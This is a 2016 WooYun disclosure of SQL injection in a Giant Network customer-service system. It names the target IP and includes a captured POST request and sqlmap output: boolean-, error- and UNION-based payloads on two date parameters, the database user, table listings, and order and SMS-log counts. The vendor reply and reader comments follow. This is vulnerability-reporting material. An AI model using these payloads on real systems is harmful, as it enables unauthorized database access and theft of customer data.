当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169176

漏洞标题:巨人网络某系统SQL注入(再次测漏15万订单+15万日志)

相关厂商:巨人网络

漏洞作者: 牛 小 帅

提交时间:2016-01-11 20:37

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

详细说明:

营运系统

http://222.73.243.217/


Q]6ZGJ}~PXH5`8N~%R{P`EU.jpg


抓包:

POST /syswork/carryon/carryonlist.php HTTP/1.1
Host: 222.73.243.217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.73.243.217/syswork/carryon/carryonlist.php
Cookie: PHPSESSID=bess3o040r75dsr9cssnpb49s4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
__EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&game_type=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11&datetext=


多参数都存在注入:

Place: POST
Parameter: datetextE
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND 1919=1919
per'='aper&datetext=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND (SELECT 46
M(SELECT COUNT(*),CONCAT(0x3a786c6f3a,(SELECT (CASE WHEN (4623=4623) THEN
0 END)),0x3a6d6a6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER
GROUP BY x)a) AND 'fqTY'='fqTY&datetext=
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' UNION ALL SELE
L, NULL, NULL, CONCAT(0x3a786c6f3a,0x57437461647077797a53,0x3a6d6a6b3a), N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nogZ
Z&datetext=
Place: POST
Parameter: datetextS
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11' AND 7224=7224 AND 'FgUt'='FgUt&date
2016-01-11&datetext=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11' AND (SELECT 7654 FROM(SELECT COUNT(
CAT(0x3a786c6f3a,(SELECT (CASE WHEN (7654=7654) THEN 1 ELSE 0 END)),0x3a6d
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) A
QO'='vsQO&datetextE=2016-01-11&datetext=
---
there were multiple injection points, please select the one to use for fol
injections:
[0] place: POST, parameter: datetextE, type: Single quoted string (default
[1] place: POST, parameter: datetextS, type: Single quoted string
[q] Quit
>
[18:40:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[18:40:52] [INFO] fetching current user
current user: 'uYW4Y7N27EDVL@10.240.31.6'


available databases [2]:
[*] information_schema
[*] mobilecsms


122表

Database: mobilecsms
[94 tables]
+---------------------------------------+
| KNOWLEDGE |
| K_SORTS |
| OPERATERECORD |
| SHIFTKNOWLEDGE |
| SHIFTOPERATERECORD |
| SK_SORTS |
| account_info_audited |
| account_info_audited_log |
| account_invoice |
| account_label |
| account_label_to_uid |
| account_lock |
| account_old_player |
| account_query_log |
| base_gm_work_field |
| base_msg_work_field |
| basic_coding |
| basic_country |
| basic_dept |
| basic_faq_sort |
| basic_game |
| basic_group |
| basic_menu |
| basic_model |
| basic_page |
| basic_resource |
| basic_resource2dept |
| basic_resource2group |
| basic_resource2user |
| basic_resourceinpage |
| basic_role |
| basic_skfaq_sort |
| basic_treenode |
| basic_user |
| basic_user2role |
| basic_user_online |
| basic_userindept |
| basic_useringroup |
| call_num |
| call_sta_time |
| cs_carryon |
| cs_coutomerinfo |
| cs_coutomerinfo_history |
| cs_dealwithorder |
| cs_dealwithorder_history |
| cs_lost_reason |
| cs_lost_reason_order |
| cs_order |
| cs_order_history |
| cs_order_invalid |
| cs_order_print |
| cs_ordertype |
| cs_overtime_sta |
| cs_overtime_standard |
| cs_overtime_standard_tt |
| cs_poll |
| cs_sta_cust_info |
| cs_sta_cust_info_tmp |
| cs_standard_reply |
| file_upload |
| game_gm_work_of_day |
| game_log_redeem |
| game_log_redeem_audit |
| game_msg_work_of_day |
| game_redeem |
| game_redeem_apply_user |
| game_redeem_audit |
| game_redeem_audit_list |
| game_redeem_audit_money |
| game_redeem_item |
| game_zone_info |
| internal_account |
| log_account_disputed |
| log_account_rollback |
| log_account_rollback_balance |
| log_fail_itil |
| log_gamerole_lock_unlock |
| order_num_alert_time |
| pilfer_account_order |
| poll_rating |
| ps_template |
| ps_template_ordertype |
| question_agreement |
| question_element |
| question_list |
| question_table |
| role_separation_info |
| self_service_config |
| send_sms_log |
| test |
| tmplog |
| uid_notcheck_pay |
| user_account_prerogative |
| user_acotype |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+


Database: mobilecsms
+----------+---------+
| Table | Entries |
+----------+---------+
| cs_order | 149141 |
+----------+---------+


15万日志

Database: mobilecsms
+--------------+---------+
| Table | Entries |
+--------------+---------+
| send_sms_log | 149379 |
+--------------+---------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 牛 小 帅@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-12 11:48

厂商回复:

感谢路人甲,此网站已限制访问

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-12 13:48 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    (⊙0⊙)

  2. 2016-01-12 14:31 | 404notfound ( 普通白帽子 | Rank:255 漏洞数:70 | 考研中,有事请留言)

    你的一个20rank要我刷多少台湾的才够

  3. 2016-01-15 00:19 | Black Angel ( 普通白帽子 | Rank:165 漏洞数:36 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    你家的大龙虾还卖不。